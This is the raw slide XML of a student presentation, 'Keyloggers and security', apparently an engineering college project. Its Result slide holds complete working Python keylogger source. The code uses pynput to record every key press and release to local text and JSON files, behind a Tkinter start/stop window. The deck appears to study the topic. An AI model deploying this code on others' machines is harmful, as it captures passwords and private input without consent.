              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>KI</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>NG</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>S </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>EN</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>GI</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>NE</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>ER</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>ING C</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>L</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" sz="2000" lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>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References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048618"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23"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endParaRPr b="1" lang="en-US">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endParaRPr b="1" lang="en-US">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRP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panose="020B0604020202020204"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>  </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Problem Statement </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>(Should not include solution)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Proposed System/Solution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Calibri"/>
              </a:rPr>
              <a:t>System </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Development Approach </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(Technology Used) </a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Algorithm &amp; Deployment  </a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Result (Output Image)</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0" sz="2000" lang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Conclusion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Future Scope</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0" sz="2000" lang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" dirty="0" sz="2000" lang="en-US">
                <a:latin typeface="Arial" panose="020B0604020202020204"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204"/>
              <a:cs typeface="Arial" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="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panose="020B0604020202020204"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>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endParaRPr b="1" sz="1800" lang="en-IN">
              <a:solidFill>
                <a:srgbClr val="0F0F0F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-305435" marL="305435"/>
            <a:r>
              <a:rPr b="1" sz="1800" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="0F0F0F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Library required to build the model</a:t>
            </a:r>
            <a:endParaRPr b="1"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panose="020B0604020202020204"/>
                <a:ea typeface="+mj-lt"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>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1" name="Title 1048678"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:solidFill>
            <a:srgbClr val="02A5E3"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>t</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048612" name="Content Placeholder 1048679"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295836" y="1601516"/>
            <a:ext cx="5194767" cy="4469572"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>import tkinter as tk</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>from tkinter import *</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>from pynput import keyboard</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>import json</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>keys_used = []</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>flag = False</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>keys = ""</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def generate_text_log(key):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    with open('key_log.txt', "w+") as keys:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        keys.write(key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def generate_json_file(keys_used):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    with open('key_log.json', '+wb') as key_log:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        key_list_bytes = json.dumps(keys_used).encode()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        key_log.write(key_list_bytes)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def on_press(key):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    if flag == False:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>            {'Pressed': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        )</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        flag = True</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>            {'Held': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        )</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    generate_json_file(keys_used)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def on_release(key):</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    global flag, keys_used, keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    keys_used.append(</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    )</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    if flag == True:</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>        flag = False</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    generate_json_file(keys_used)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    keys = keys + str(key)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    generate_text_log(str(keys))</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def start_keylogger():</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    listener = keyboard.Listener(on_press=on_press, on_release=on_release)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    listener.start()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    label.config(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    start_button.config(state='disabled')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    stop_button.config(state='normal')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>def stop_keylogger():</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    global listener</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    listener.stop()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    label.config(text="Keylogger stopped.")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    start_button.config(state='normal')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>    stop_button.config(state='disabled')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>root = Tk()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>root.title("Keylogger")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>label.config(anchor=CENTER)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>label.pack()</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>start_button = Button(root, text="Start", command=start_keylogger)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>start_button.pack(side=LEFT)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>stop_button = Button(root, text="Stop", command=stop_keylogger, state='disabled')</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>stop_button.pack(side=RIGHT)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>root.geometry("250x250")</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN"/>
              <a:t>root.mainloop()</a:t>
            </a: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Conclusion</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048614"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5"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6"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panose="020B0604020202020204"/>
                <a:cs typeface="Arial" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Future scope</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0" sz="4400" lang="en-US">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 WWO_wpscloud_20231009072630-3916d64f34</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Keyloggers and security</dc:title>
  <dc:creator>Vaibhav Ostwal</dc:creator>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-08T19:27:22Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-11T09:38:08Z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7a7c519ad0554087ba2849901c103f39</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="KSOProductBuildVer">
    <vt:lpwstr>1033-0.0.0.0</vt:lpwstr>
  </property>
</Properties>
</file>